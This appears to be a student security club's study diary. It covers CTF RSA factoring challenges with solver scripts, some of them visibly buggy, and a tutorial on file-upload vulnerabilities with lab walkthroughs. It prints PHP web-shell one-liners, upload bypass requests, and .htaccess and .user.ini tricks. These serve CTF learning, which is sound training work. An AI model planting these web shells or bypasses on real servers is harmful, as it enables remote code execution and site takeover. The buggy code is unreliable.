皮蛋厂的学习日记 | 2022.4.24 有关 *CTF ezRSA一点思考&文件上传漏洞

皮蛋厂的学习日记系列为山东警察学院网安社成员日常学习分享，希望能与大家共同学习、共同进步~

• 2021级 Mu.Chen |有关 *CTF ezRSA一点思考

• 前言

• 缘起

• 深入

• 重点

• 2021级 Will1am | 文件上传漏洞

• 文件上传漏洞是什么

• 文件上传漏洞需要满足的条件

• 产生原因

• 文件上传常见验证

• 绕过

• 刷题

2021级 Mu.Chen |有关 *CTF ezRSA一点思考

前言

比赛的时候一直在从二进制的角度考虑这道题，后来在逛密码爷博客的时候，看到一条公式，一下子有了新思路

缘起

#!/usr/bin/env python

from Crypto.Util.number import *
from secret import exp, flag, nbit

assert exp & (exp + 1) == 0

def adlit(x):
    l = len(bin(x)[2:])
    return (2 ** l - 1) ^ x

nbit = 1024
l = [1023,1024,1025]
def genadlit(nbit):
    while True:
        p = getPrime(nbit)
        q = adlit(p) + 31337
        if isPrime(q):
            return p, q

p, q = genadlit(nbit)
e, n = exp, p * q

c = pow(bytes_to_long(flag), e, n)

print 'n =', hex(n)
print 'c =', hex(c)
#n = 0x3ff77ad8783e006b6a2c9857f2f13a9d896297558e7c986c491e30c1a920512a0bad9f07c5569cf998fc35a3071de9d8b0f5ada4f8767b828e35044abce5dcf88f80d1c0a0b682605cce776a184e1bcb8118790fff92dc519d24f998a9c04faf43c434bef6c0fa39a3db7452dc07ccfced9271799f37d91d56b5f21c51651d6a9a41ee5a8af17a2f945fac2b1a0ea98bc70ef0f3e37371c9c7b6f90d3d811212fc80e0abcd5bbefe0c6edb3ca6845ded90677ccd8ff4de2c747b37265fc1250ba9aa89b4fd2bdfb4b4b72a7ff5b5ee67e81fd25027b6cb49db610ec60a05016e125ce0848f2c32bff33eed415a6d227262b338b0d1f3803d83977341c0d3638fL
#c = 0x2672cade2272f3024fd2d1984ea1b8e54809977e7a8c70a07e2560f39e6fcce0e292426e28df51492dec67d000d640f3e5b4c6c447845e70d1432a3c816a33da6a276b0baabd0111279c9f267a90333625425b1d73f1cdc254ded2ad54955914824fc99e65b3dea3e365cfb1dce6e025986b2485b6c13ca0ee73c2433cf0ca0265afe42cbf647b5c721a6e51514220bab8fcb9cff570a6922bceb12e9d61115357afe1705bda3c3f0b647ba37711c560b75841135198cc076d0a52c74f9802760c1f881887cc3e50b7e0ff36f0d9fa1bfc66dff717f032c066b555e315cb07e3df13774eaa70b18ea1bb3ea0fd1227d4bac84be2660552d3885c79815baef661L

密码爷没标记题目出处，就把他博客挂一下吧

https://tsuppari404.github.io/2099/09/12/crypto%E7%9A%84%E6%8C%A8%E6%89%93%E4%B9%8B%E8%B7%AF(%E4%B8%80)/页面第17题

定义了一个名为adlit()的函数，比较新奇，单拿出来试一下

def adlit(x):
    l = len(bin(x)[2:])
    return (2 ** l - 1) ^ x

a=616161
print(bin(a))
print(bin(adlit(a)))
0b10010110011011100001
0b01101001100100011110

补上bin(adlit(a))函数前的那个0，不难看出两个二进制数是相反的，adlit函数就是对一个数的二进制数进行取反。跟*CTF中间的600位一样。

密码爷给了这样一个公式：

p+adlit(p)=2^(nbit)-1

同时，题目中给了：q = adlit(p) + 31337

联立可得：p+q=(2**nbit)-1+31337

方程组直接用sage解一下就行，得到

p=91934396941118575436929554782758166784623142015203107928295225306949429527662253180027648166060067602233902389535868116051536080388999480377007211745229221564969130373120800620379012435790356909945473565305296926519232706950561924532325538399351352696805684504904629096892037592742285758390953849377910498739
q=87834916545113015336000964296144306577174555879027549345134855850783246277838709952680829156347468418886211490335525241607253688425417142115840218894244902812798763051744684655923207165455737209507609386779708842318917975391900956941587572141475884466544826179681669143055208345737430546444402480246313669813

已知assert exp & (exp + 1) == 0

我们只能判断exp=2**k-1，没有断言表示e与phi互素

所以直接做最坏打算，设e和phi不互素， 在爆破出e之后，令g=gcd(e,phi)，e1=e//g，对e1进行常规的RSA操作，最后求出的m开g次方根就好

最终exp是这个样子

import gmpy2
from Crypto.Util.number import *
n = 0x3ff77ad8783e006b6a2c9857f2f13a9d896297558e7c986c491e30c1a920512a0bad9f07c5569cf998fc35a3071de9d8b0f5ada4f8767b828e35044abce5dcf88f80d1c0a0b682605cce776a184e1bcb8118790fff92dc519d24f998a9c04faf43c434bef6c0fa39a3db7452dc07ccfced9271799f37d91d56b5f21c51651d6a9a41ee5a8af17a2f945fac2b1a0ea98bc70ef0f3e37371c9c7b6f90d3d811212fc80e0abcd5bbefe0c6edb3ca6845ded90677ccd8ff4de2c747b37265fc1250ba9aa89b4fd2bdfb4b4b72a7ff5b5ee67e81fd25027b6cb49db610ec60a05016e125ce0848f2c32bff33eed415a6d227262b338b0d1f3803d83977341c0d3638f
c = 0x2672cade2272f3024fd2d1984ea1b8e54809977e7a8c70a07e2560f39e6fcce0e292426e28df51492dec67d000d640f3e5b4c6c447845e70d1432a3c816a33da6a276b0baabd0111279c9f267a90333625425b1d73f1cdc254ded2ad54955914824fc99e65b3dea3e365cfb1dce6e025986b2485b6c13ca0ee73c2433cf0ca0265afe42cbf647b5c721a6e51514220bab8fcb9cff570a6922bceb12e9d61115357afe1705bda3c3f0b647ba37711c560b75841135198cc076d0a52c74f9802760c1f881887cc3e50b7e0ff36f0d9fa1bfc66dff717f032c066b555e315cb07e3df13774eaa70b18ea1bb3ea0fd1227d4bac84be2660552d3885c79815baef661
p=91934396941118575436929554782758166784623142015203107928295225306949429527662253180027648166060067602233902389535868116051536080388999480377007211745229221564969130373120800620379012435790356909945473565305296926519232706950561924532325538399351352696805684504904629096892037592742285758390953849377910498739
q=87834916545113015336000964296144306577174555879027549345134855850783246277838709952680829156347468418886211490335525241607253688425417142115840218894244902812798763051744684655923207165455737209507609386779708842318917975391900956941587572141475884466544826179681669143055208345737430546444402480246313669813
phi=(p-1)*(q-1)
k=1
while True:
    e=2**k-1
    k+=1
    g=gmpy2.gcd(e,phi)
    e1=e//g
    d=gmpy2.invert(e1,phi//g)
    m=gmpy2.powmod(c,d,n)
    flag=long_to_bytes(gmpy2.iroot(m,g)[0])
    if b'CTF' in flag:
        print(flag)
        break

深入

题目：

from Crypto.Util.number import isPrime, getStrongPrime
from gmpy import next_prime
from secret import flag

# Anti-Fermat Key Generation
p = getStrongPrime(1024)
q = next_prime(p ^ ((1<<1024)-1))
n = p * q
e = 65537

# Encryption
m = int.from_bytes(flag, 'big')
assert m < n
c = pow(m, e, n)

print('n = {}'.format(hex(n)))
print('c = {}'.format(hex(c)))
#n = 0x1ffc7dc6b9667b0dcd00d6ae92fb34ed0f3d84285364c73fbf6a572c9081931be0b0610464152de7e0468ca7452c738611656f1f9217a944e64ca2b3a89d889ffc06e6503cfec3ccb491e9b6176ec468687bf4763c6591f89e750bf1e4f9d6855752c19de4289d1a7cea33b077bdcda3c84f6f3762dc9d96d2853f94cc688b3c9d8e67386a147524a2b23b1092f0be1aa286f2aa13aafba62604435acbaa79f4e53dea93ae8a22655287f4d2fa95269877991c57da6fdeeb3d46270cd69b6bfa537bfd14c926cf39b94d0f06228313d21ec6be2311f526e6515069dbb1b06fe3cf1f62c0962da2bc98fa4808c201e4efe7a252f9f823e710d6ad2fb974949751
#c = 0x60160bfed79384048d0d46b807322e65c037fa90fac9fd08b512a3931b6dca2a745443a9b90de2fa47aaf8a250287e34563e6b1a6761dc0ccb99cb9d67ae1c9f49699651eafb71a74b097fc0def77cf287010f1e7bd614dccfb411cdccbb84c60830e515c05481769bd95e656d839337d430db66abcd3a869c6348616b78d06eb903f8abd121c851696bd4cb2a1a40a07eea17c4e33c6a1beafb79d881d595472ab6ce3c61d6d62c4ef6fa8903149435c844a3fab9286d212da72b2548f087e37105f4657d5a946afd12b1822ceb99c3b407bb40e21163c1466d116d67c16a2a3a79e5cc9d1f6a1054d6be6731e3cd19abbd9e9b23309f87bfe51a822410a62

思路一

我们看到，p是随机生成的一个1024位的强素数，q是p取反后的下一个素数

因此p+q是略大于(2**1024)-1

可以表示为

同时，由于n是奇数，且pq是n的两个因子，又可以获得以下等式

又有

可以得到

可以用这个式子对p_求出一个大概值，之后对p_之后的素数进行判断,如果符合p，则直接进行rsa输出

import gmpy2
import sympy
from Crypto.Util.number import *
n = 0x1ffc7dc6b9667b0dcd00d6ae92fb34ed0f3d84285364c73fbf6a572c9081931be0b0610464152de7e0468ca7452c738611656f1f9217a944e64ca2b3a89d889ffc06e6503cfec3ccb491e9b6176ec468687bf4763c6591f89e750bf1e4f9d6855752c19de4289d1a7cea33b077bdcda3c84f6f3762dc9d96d2853f94cc688b3c9d8e67386a147524a2b23b1092f0be1aa286f2aa13aafba62604435acbaa79f4e53dea93ae8a22655287f4d2fa95269877991c57da6fdeeb3d46270cd69b6bfa537bfd14c926cf39b94d0f06228313d21ec6be2311f526e6515069dbb1b06fe3cf1f62c0962da2bc98fa4808c201e4efe7a252f9f823e710d6ad2fb974949751
c = 0x60160bfed79384048d0d46b807322e65c037fa90fac9fd08b512a3931b6dca2a745443a9b90de2fa47aaf8a250287e34563e6b1a6761dc0ccb99cb9d67ae1c9f49699651eafb71a74b097fc0def77cf287010f1e7bd614dccfb411cdccbb84c60830e515c05481769bd95e656d839337d430db66abcd3a869c6348616b78d06eb903f8abd121c851696bd4cb2a1a40a07eea17c4e33c6a1beafb79d881d595472ab6ce3c61d6d62c4ef6fa8903149435c844a3fab9286d212da72b2548f087e37105f4657d5a946afd12b1822ceb99c3b407bb40e21163c1466d116d67c16a2a3a79e5cc9d1f6a1054d6be6731e3cd19abbd9e9b23309f87bfe51a822410a62
e=65537
s=1<<1024
p_=int((2**1024+gmpy2.iroot((2**1024)**2-4*n,2)[0])//2)
while n%p_!=0:
    p=sympy.nextprime(p_)
q=n//p
phi=(p-1)*(q-1)
d=gmpy2.invert(e,phi)
m=gmpy2.powmod(c,d,n)
print(long_to_bytes(m))

这种方法计算量很大，脚本跑了好久好久

思路二

因为q是p取反后的下一个素数，因此两者差值应该不大，设其差值为r

则 q=(1<<1024-1)-p+r p+q=(1<<1024-1)+r

又因为

所以，(p+q)**2-4n能否开方可以作为一个判断条件

from Crypto.Util.number import *
import gmpy2
n= 0x1ffc7dc6b9667b0dcd00d6ae92fb34ed0f3d84285364c73fbf6a572c9081931be0b0610464152de7e0468ca7452c738611656f1f9217a944e64ca2b3a89d889ffc06e6503cfec3ccb491e9b6176ec468687bf4763c6591f89e750bf1e4f9d6855752c19de4289d1a7cea33b077bdcda3c84f6f3762dc9d96d2853f94cc688b3c9d8e67386a147524a2b23b1092f0be1aa286f2aa13aafba62604435acbaa79f4e53dea93ae8a22655287f4d2fa95269877991c57da6fdeeb3d46270cd69b6bfa537bfd14c926cf39b94d0f06228313d21ec6be2311f526e6515069dbb1b06fe3cf1f62c0962da2bc98fa4808c201e4efe7a252f9f823e710d6ad2fb974949751
c = 0x60160bfed79384048d0d46b807322e65c037fa90fac9fd08b512a3931b6dca2a745443a9b90de2fa47aaf8a250287e34563e6b1a6761dc0ccb99cb9d67ae1c9f49699651eafb71a74b097fc0def77cf287010f1e7bd614dccfb411cdccbb84c60830e515c05481769bd95e656d839337d430db66abcd3a869c6348616b78d06eb903f8abd121c851696bd4cb2a1a40a07eea17c4e33c6a1beafb79d881d595472ab6ce3c61d6d62c4ef6fa8903149435c844a3fab9286d212da72b2548f087e37105f4657d5a946afd12b1822ceb99c3b407bb40e21163c1466d116d67c16a2a3a79e5cc9d1f6a1054d6be6731e3cd19abbd9e9b23309f87bfe51a822410a62
e=65537
for r in range(100000000000000):
    x=(1<<1024)-1+r
    y,s=gmpy2.iroot(x**2-4n,2)
    if s:
        p=(x+y)//2
        q=n//y
        phi=(p-1)*(q-1)
        d=gmpy2.invert(e,phi)
        m-gmpy2.powmod(c,d,n)
        print(print(long_to_bytes(m)))
        break

秒出flag

重点

from Crypto.Util.number import getStrongPrime
from gmpy import next_prime
from random import getrandbits
from flag import flag

p=getStrongPrime(1024)
q=next_prime(p^((1<<900)-1)^getrandbits(300))
n=p*q
e=65537

m=int(flag.encode('hex'),16)
assert m<n
c=pow(m,e,n)

print(hex(n))
#0xe78ab40c343d4985c1de167e80ba2657c7ee8c2e26d88e0026b68fe400224a3bd7e2a7103c3b01ea4d171f5cf68c8f00a64304630e07341cde0bc74ef5c88dcbb9822765df53182e3f57153b5f93ff857d496c6561c3ddbe0ce6ff64ba11d4edfc18a0350c3d0e1f8bd11b3560a111d3a3178ed4a28579c4f1e0dc17cb02c3ac38a66a230ba9a2f741f9168641c8ce28a3a8c33d523553864f014752a04737e555213f253a72f158893f80e631de2f55d1d0b2b654fc7fa4d5b3d95617e8253573967de68f6178f78bb7c4788a3a1e9778cbfc7c7fa8beffe24276b9ad85b11eed01b872b74cdc44959059c67c18b0b7a1d57512319a5e84a9a0735fa536f1b3

print(hex(c))
#0xd7f6c90512bc9494370c3955ff3136bb245a6d1095e43d8636f66f11db525f2063b14b2a4363a96e6eb1bea1e9b2cc62b0cae7659f18f2b8e41fca557281a1e859e8e6b35bd114655b6bf5e454753653309a794fa52ff2e79433ca4bbeb1ab9a78ec49f49ebee2636abd9dd9b80306ae1b87a86c8012211bda88e6e14c58805feb6721a01481d1a7031eb3333375a81858ff3b58d8837c188ffcb982a631e1a7a603b947a6984bd78516c71cfc737aaba479688d56df2c0952deaf496a4eb3f603a46a90efbe9e82a6aef8cfb23e5fcb938c9049b227b7f15c878bd99b61b6c56db7dfff43cd457429d5dcdb5fe314f1cdf317d0c5202bad6a9770076e9b25b1

nextprime函数影响的是低位的数据，对其高位没有影响，可以认为

n=0xe78ab40c343d4985c1de167e80ba2657c7ee8c2e26d88e0026b68fe400224a3bd7e2a7103c3b01ea4d171f5cf68c8f00a64304630e07341cde0bc74ef5c88dcbb9822765df53182e3f57153b5f93ff857d496c6561c3ddbe0ce6ff64ba11d4edfc18a0350c3d0e1f8bd11b3560a111d3a3178ed4a28579c4f1e0dc17cb02c3ac38a66a230ba9a2f741f9168641c8ce28a3a8c33d523553864f014752a04737e555213f253a72f158893f80e631de2f55d1d0b2b654fc7fa4d5b3d95617e8253573967de68f6178f78bb7c4788a3a1e9778cbfc7c7fa8beffe24276b9ad85b11eed01b872b74cdc44959059c67c18b0b7a1d57512319a5e84a9a0735fa536f1b3
x=sympy.Symbol('x')
f1=x**2+x-n//2**1800
result=sympy.solve([f1],[x])
print(result)
#x=20226195070633070235386534147535171929

知道了高位的p，第一反应应该就是用高位攻击梭出全部的p来，由于p是1024位的，我们至少需要知道前576位才能爆出整个p，还差452位，需要对中间300到900位进行分析。

可以像刚刚那样接着反费马，之后接一个coppsmith

import gmpy2
n=0xe78ab40c343d4985c1de167e80ba2657c7ee8c2e26d88e0026b68fe400224a3bd7e2a7103c3b01ea4d171f5cf68c8f00a64304630e07341cde0bc74ef5c88dcbb9822765df53182e3f57153b5f93ff857d496c6561c3ddbe0ce6ff64ba11d4edfc18a0350c3d0e1f8bd11b3560a111d3a3178ed4a28579c4f1e0dc17cb02c3ac38a66a230ba9a2f741f9168641c8ce28a3a8c33d523553864f014752a04737e555213f253a72f158893f80e631de2f55d1d0b2b654fc7fa4d5b3d95617e8253573967de68f6178f78bb7c4788a3a1e9778cbfc7c7fa8beffe24276b9ad85b11eed01b872b74cdc44959059c67c18b0b7a1d57512319a5e84a9a0735fa536f1b3
c=0xd7f6c90512bc9494370c3955ff3136bb245a6d1095e43d8636f66f11db525f2063b14b2a4363a96e6eb1bea1e9b2cc62b0cae7659f18f2b8e41fca557281a1e859e8e6b35bd114655b6bf5e454753653309a794fa52ff2e79433ca4bbeb1ab9a78ec49f49ebee2636abd9dd9b80306ae1b87a86c8012211bda88e6e14c58805feb6721a01481d1a7031eb3333375a81858ff3b58d8837c188ffcb982a631e1a7a603b947a6984bd78516c71cfc737aaba479688d56df2c0952deaf496a4eb3f603a46a90efbe9e82a6aef8cfb23e5fcb938c9049b227b7f15c878bd99b61b6c56db7dfff43cd457429d5dcdb5fe314f1cdf317d0c5202bad6a9770076e9b25b1
e=65537
a=20226195070633070235386534147535171929
s=2*a*2**900+2**900-2**300
p_=int((s+gmpy2.iroot(s**2-4*n,2)[0])//2)
PR.<x>=PolynomialRing(Zmod(n))
f=p_+x
roots=f.small_roots(X=2^450,beta=0.45,epsilon=0.03)[0]
if roots:
    p=p_+int(roots)
    q=n//p
    phi=(p-1)*(q-1)
    d=gmpy2.invert(e,phi)
    m=int(pow(c,d,n))
    print(m.to_bytes(50,'big'))

2021级 Will1am | 文件上传漏洞

文件上传漏洞是什么

文件上传漏洞是指用户上传了一个可执行的脚本文件，并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的，“文件上传” 本身没有问题，有问题的是文件上传后，服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全，则会导致严重的后果。

文件上传漏洞需要满足的条件

首先，上传的文件能够被web容器解释执行。所以文件上传后所在的目录要是web容器所覆盖到的路径。

其次，用户能够从web访问这个文件。如果文件上传了，但用户无法通过web访问，或者无法得到web容器解释这个脚本，那么也不能称之为漏洞。最后，用户上传的文件若被安全检查、格式化、图片压缩等功能改变了内容，则也可能导致攻击不成功。

产生原因

一些web应用程序中允许上传图片，文本或者其他资源到指定的位置，文件上传漏洞就是利用这些可以上传的地方将恶意代码植入到服务器中，再通过url去访问以执行代码.

造成文件上传漏洞的原因是:

1.服务器配置不当

2.开源编辑器上传漏洞

3.本地文件上传限制被绕过

4.过滤不严格被绕过

5.文件解析漏洞导致文件执行

6.文件路径截断

文件上传漏洞对Web应用来说是一种非常严重的漏洞。一般情况下，Web应用都会允许用户上传一些文件，如头像、附件等信息，如果Web应用没有对用户上传的文件进行有效的检查过滤，那么恶意用户就会上传一句话木马等Webshell，从而达到控制Web网站的目的。

相册，头像上传，视频，照片分享，论坛发帖和邮箱等可以上传附件的地方是上传漏洞的高危地带

文件上传常见验证

文件头的验证（文件内容的验证）：属于间接验证，内容头信息，不严谨可通过抓包修改进行欺骗。

文件类型的验证：属于间接验证：MIME信息 也就是数据包中的content-Type类型。可以修改进行一个欺骗。不严谨。

后缀名的验证：属于直接验证，黑名单验证和白名单验证。黑名单就是明确不允许上传……文件类型，如：.asp、.php、.jsp、.aspx、.cgi、war文件。当然也得看情况是否支持。白名单就是明确只允许上传……文件，如：.jpg、.png、.gif、zip、rar文件，相对黑名单较安全。

绕过

一般都是在网页上写一段javascript脚本，校验上传文件的后缀名，有白名单形式也有黑名单形式。

判断方式：在浏览加载文件，但还未点击上传按钮时便弹出对话框，内容如：只允许上传.jpg/.jpeg/.png后缀名的文件，而此时并没有发送数据包

可以利用 burpsuit 抓包改包，先上传一个gif类型的木马，然后通过burp将其改为asp/php/jsp后缀名即可。

通过火狐插件 NOscript 插件或者禁用 IE 中 JS 脚本；

通过 firbug 插件元素审核修改代码（如删除 onsubmit=”return checkFile()” 事件）；

通过 firbug 元素审核 javascirpt 脚本中添加上传文件类型；

通过利用 burp 抓包改包，先上传一个 gif 类型的木马，然后通过 burp 将其改为asp/php/jsp 后缀名即可 注意：这里修改文件名字后，请求头中的 Content-Length 的值也要改。

黑名单绕过

扩展名绕过

有些黑名单定义的不可上传文件的后缀名不完整，可用.php5、.phtml、.phps、.pht文件进行上传，从而实现绕过。

黑名单检测：一般有个专门的 blacklist 文件，里面会包含常见的危险脚本文件。绕过方法：（1）找黑名单扩展名的漏网之鱼 - 比如 iis6.0 中的 asa 和 cer （2）可能存在大小写绕过漏洞 - 比如 aSp(iis6.0 中可以）和 pHp（只能在 小于 php5.3.39 中的 linux 中）之中 （3）能被web容器解析的文件其他扩展名列表：

jsp, jspx ,jspf

asp asa cer cdx,htr,xml,html

aspx,ashx,asmx,asax,ascx

配置文件绕过

上传配置文件.htaccess，在这个文件写上代码

<FilesMatch "x.png">
SetHandler application/x-httpd-php

如果有一个文件的名字是x.png，那么这个png文件就会被当作php文件进行解析，这样也可以实现绕过

特殊后缀绕过

将Burpsuite截获的数据包中backlion.php名字改为baclion.php4(php1,php2,php3,php4,php5), 前提条件是 http.conf 中设置AddType application/x-httpd-php .php1(php 的版本小于等于 5.3.29 以下)

大小写绕过

大小写绕过将.phP文件名后缀大写

单双重后缀名绕过

上传时将bp截的数据包中文件名backlion.php(backlion.asa)改为backlion.pphphph(backlion.asasaa)，那么过滤了第一个"php"字符串"后， 开头的'p'和结尾的'hp'就组合又形成了 php

服务端 MIME 文件类型(Content-Type)绕过

MIME 的作用：

使客户端软件，区分不同种类的数据，例如web浏览器就是通过 MIME 类 型来判断文件是GIF图片，还是可打印的 PostScript 文件。web服务器使用 MIME 来说明发送数据的种类，web客户端使用 MIME 来说明希望接收到的数据种类，它是服务器用来判断浏览器传递文件格式的重要标记项。

常用的文件上传类型的 MIME 表：text/plain（纯文本） text/html（HTML 文档） text/javascript（js 代码） application/xhtml+xml（XHTML 文档） image/gif（GIF 图像） image/jpeg（JPEG 图像） image/png（PNG 图像） video/mpeg（MPEG 劢画） application/octet-stream（二迚制数据） application/pdf（PDF 文档） application/(编程语言) 该种语言的代码 application/msword（Microsoft Word 文件） message/rfc822（RFC 822 形式） multipart/alternative（HTML 邮件的 HTML 形式和纯文本形式，相同内容使 用不同形式表示） application/x-www-form-urlencoded（POST 方法提交的表单）multipart/form-data（POST 提交时伴随文件上传的表单）

绕过方法：上传对文件类型做了限制，可通过 burpsuit 将其他类文件类型 修改为如：Content-Type：image/gif 和 image/jpeg 等运行的文件类型。

比如

POST /upload.php HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: localhost
User-Agent: libwww-perl/5.803
Content-Type: multipart/form-data; boundary=xYzZY
Content-Length: 155
--xYzZY
Content-Disposition: form-data; name="userfile"; filename="shell.php"
Content-Type: image/gif (原为 Content-Type: text/plain)
<?php system($_GET['command']);?>
--xYzZY-

杂七杂八的字符绕过

收尾去空绕过，在后缀名加空格（需要在抓到的数据包中加空格，直接在文件后缀名加空格会命名不成功，它会自动删除空格）

不删除末尾的点，在后缀名加点（需要在抓到的数据包中加点，直接在文件后缀名加点会命名不成功，它会自动删除点）

没有去除字符串::$DATA。如果文件名+"::$DATA"会把::$DATA之后的数据当成文件流处理,不会检测后缀名。例如：x.php::$DATAWindows会自动去掉末尾的::$DATA变成x.php,但是这刚好就可以绕过黑名单了。

有时没有循环验证，只验证一次，可以使用x.php. .类似的方法进行绕过。

3.白名单绕过：

配合web容器的解析漏洞：

IIS中的目录解析漏洞和分号解析漏洞 ：

将一句话木马的文件名 backlion.php，改成 backlion.php.abc(奇怪的不被解析的后缀名都 行)。首先， 服务器验证文件扩展名的时候，验证的是.abc，只要该扩展名符合服务器端黑白名单觃则，即可上传。

nginx 空字节漏洞 xxx.jpg%00.php 这样的文件名会被解析为php代码运行。

apache 的解析漏洞，上传如 a.php.rar a.php.gif 类型的文件名，可以避免 对于php文件的过滤机制，但是由于 apache 在解析文件名的时候是从右向左读，如果遇到不能识别的扩展名则跳过，rar 等扩展名是 apache 不能识别的， 因此就会直接将类型识别为 php，从而达到了注入php代码的目的。

%00 截断上传绕过

通过抓包截断将 backlion.asp.jpg 后面的一个.换成%00 在上传的时候即 backlion.asp%00.jpg，当文件系统读到%00 时，会认为文件已经结束，从而将 backlion.asp.jpg 的内容写入到 backlion.asp 中，从而达到攻击的目的。%00 不是针对所有基于白名单的后缀名检查都能绕过，代码的实现过程中必须存在截 断上传漏洞，上传格式如下：bk.asp%00.jpg

name= getname(httprequest) //假如这时候获取到的文件名是 help.asp.jpg(asp 后面为 0x00)
type =gettype(name)        //而在 gettype()函数里处理方式是从后往前扫描扩展名，所以判断为 jpg
if(type == jpg)
SaveFileToPath(UploadPath.name, name)   //但在这里却是以 0x00 作为文件名截断
//最后以 help.asp 存入路径里

文件头内容检测绕过

不同的图片文件都有不同文件头，如：PNG：文件头标识 (8 bytes) 89 50 4E 47 0D 0A 1A 0A JPEG：文件头标识 (2 bytes): 0xff, 0xd8 (SOI) (JPEG 文件标识) GIF：文件头标识 (6 bytes) 47 49 46 38 39(37) 61 上传文件的时候会检查上传文件是否合法，如图片文件是否文件头含有 gif89, 这里可以通过一句话图片木马生成工具 edjpgcom 戒者通过编辑器在木马内容基础上再加了一些文件信息，有点像下面的结构:

GIF89a <?php phpinfo(); ?>

WAF绕过

填充垃圾数据绕过

有些主机 WAF 软件为了不影响web服务器的性能，会对校验的用户数据设置 大小上限，比如 1M。此种情况可以构造一个大文件，前面 1M 的内容为垃圾内 容，后面才是真正的木马内容，便可以绕过 WAF 对文件内容的校验；' Content-Type 类型数据后添加垃圾数据：

Content-Type: image/jpeg
a=11111111111111111111111111111111111111111111111111111111
GIF89a
<?php phpinfo(); ?>

也可以将垃圾数据放在数据包最开头，这样便可以绕过对文件名的校验。

------WebKitFormBoundaryYijPw9QB0WlswSL2
a=111111111111111111111111111111111111111111111111111111111111111111111   
Content-Disposition: form-data; name="file_x"; filename="w.jpg"
Content-Type: image/jpeg

文件扩展名出回车绕过（只支持 php）

Content-Disposition: form-data; nAme="upfile"; filename="w.ph
p" Content-Type: image/jpeg

将php断开

Content-Disposition: form-data; nAme="upfile"; file
name="w.php"
Content-Type: image/jpeg

将filename断开

Content-Disposition: form-data; nAme="upfile"; fi
lename="w.php" Content-Type: image/jpeg

将filename断开

文件重命名绕过

如果 web 程序会将 filename 除了扩展名的那段重命名的话，那么还可以构造更多的点、符号等等。

Content-Disposition: form-data;  name="  file1";
filename="w....................................................................................................................
............................................................................................................asp"

输入几百个点

刷题

打开题目显示需要上传图片文件

先写个一句话的马

<?php @eval($_POST['attack']) ?>

将后缀改为jpg后发现上传失败，抓包后发现需要使用png格式的图片，将后缀改为png

上传进行抓包，更改为php，使命令执行

然后使用蚁剑进行连接，注意要进入到url/upload/shell.php下进行连接，密码为一句话中执行的语句，连接后进入文件管理。

找到php

这个题我用151的办法解出来了，但毕竟不是一个题，我查看了别人的wp，找到了其中的不同。

其中第二题给的提示为后端校验要严密，由此可知考察了后端验证的问题，与此不同的是151考察的是前端验证，但由于两个题我都使用蚁剑进行了后台的连接，所以直接绕过了，所以一个方法解出来了两个题。

第二次做的时候失误直接上传了之前的php文件，发现Content-Type跟随进行了变更，那就补充一下关于Content-Type的知识点。

Content-Type是文件类型,不同的文件都会对应不同的ContentType。PHP文件的文件类型为:application/octet-stream Png的Content-Type是image/png

据包的请求包头中,开发者会通过Content-Type判断文件是否允许上传,但是Content-Type可以通过抓包篡改，这样就可以绕过Content-Type过滤。

所以我们应该将Content-Type修改为

image/png

修改后再发送

发送成功后显示上传路径为url/upload/152.php

因为传参方式为post，放到火狐上去处理

命令成功执行了

直接访问flag.php即可

1=system("tac ../flag.php");

首先补充一个知识

.user.ini

我们可以在.user.ini中设置php.ini中PHP_INI_PERDIR和PHP_INI_USER模式的 INI 设置，而且只要是在使用CGI／FastCGI模式的服务器上都可以使用.user.ini

auto_prepend_file和auto_append_file设置我们指定一个文件（如a.jpg），那么该文件就会被包含在要执行的php文件中（如index.php），类似于在index.php中插入一句：require(./a.jpg);这两个设置的区别只是在于auto_prepend_file是在文件前插入；auto_append_file在文件最后插入（当文件调用的有exit()时该设置无效）所以要求当前目录必须要有php文件getflag思路：我们上传一个.user.ini 文件设置一个文件1.jpg然后访问index.php就相当于包含了1.jpg

其中GIF89a是告诉系统，根据图形交换格式（GIF）89a版进行格式化，生成图形

以上大致意思是PHP有一个可以重写的配置文件，类似于apache的.htaccess绕过，但是PHP这个比较苛刻，需要开启一定功能才能使用，题目是默认开启的

回归题目

1.我们先上传.user.ini文件（当然文件名抓包之后再修改）

GIF89a
auto_prepend_file=pass.jpg

2.然后再上传包含的PHP文件，访问/upload/index.php自动包含

3.使用蚁剑寻找并读取flag

像前几个题一样上传写有木马的图片，但一直上传失败，提示为文件内容不合规。

通过抓包来修改一下文件头，发现也没用，一样传不上去。

猜测是对内容进行了过滤，通过bp将文件内容删除后发现上传成功了

既然在内容上含有敏感信息，就尝试了一下短标签绕过

<?= eval($_POST[1]);?>
<? eval($_POST[1]);?>
<% eval($_POST[1]);%>

传入png的木马文件可以，但是php文件加了png文件头也没用

说明php是不能使用的

也说明需要像上一题一样借助.user.ini进行执行，访问index.php成功就更加证明了前面的猜想

再学一下这个点吧，感觉上一个题学的不是很明白啊。。。

.user.ini

php.ini 是 php 的一个全局配置文件，对整个 web 服务起作用；而.user.ini 和.htaccess 一样是目录的配置文件，.user.ini 就是用户自定义的一个 php.ini，通常用这个文件来构造后门和隐藏后门。

实例

php 配置项中有两个配置可以起到一些作用

auto_prepend_file = <filename>         //包含在文件头
auto_append_file = <filename>          //包含在文件尾

这两个配置项的作用相当于一个文件包含，比如

// .user.ini
auto_prepend_file = 1.jpg

// 1.jpg
<?php phpinfo();?>

// 11.php

也就是在一个目录下有.user.ini 这个配置文件，配置内容为上，有 1.jpg，同时该目录下还需要有.php 后缀的文件，auto_prepend_file = 1.jpg 这个配置的意思就是在当前目录下的.php 文件包含 1.jpg 这个图片，在此处相当于在 11.php 文件头插入了 require('1.jpg') 这条语句，也就是说相当于文件包含。

另一条配置包含在文件尾，如果遇到了 exit 语句的话就会失效。

效仿上一个题，先传入.user.ini

auto_prepend_file=shell.png

然后传入一句话木马，这里用大小写进行了绕过

<?phP
 echo 123;pHpinfo();eval($_POST['154']); 
?>

然后通过蚁剑进行连接，获取flag

这题和上题差不多，上传正常png文件可以，带木马的就不行

然后就用上次的大小写绕过，但发现绕过不了了，那就只能更换短标签一个个试

<?= eval($_POST[155]);?>

然后步骤上基本等同于上一题，不多赘述了。

这题做了半天，无头苍蝇一样

首先上传png测试一下，果然过滤依旧存在，但我再往上传输没有马的正常png使也被过滤了，传输失败。开始我以为是因为压缩等因素导致了文件本身的变化所以才会被过滤，结果一连尝试了好几张都是一个情况，网上查找wp找了半天，发现可能是因为文件内容过长导致了传输出现了错误。

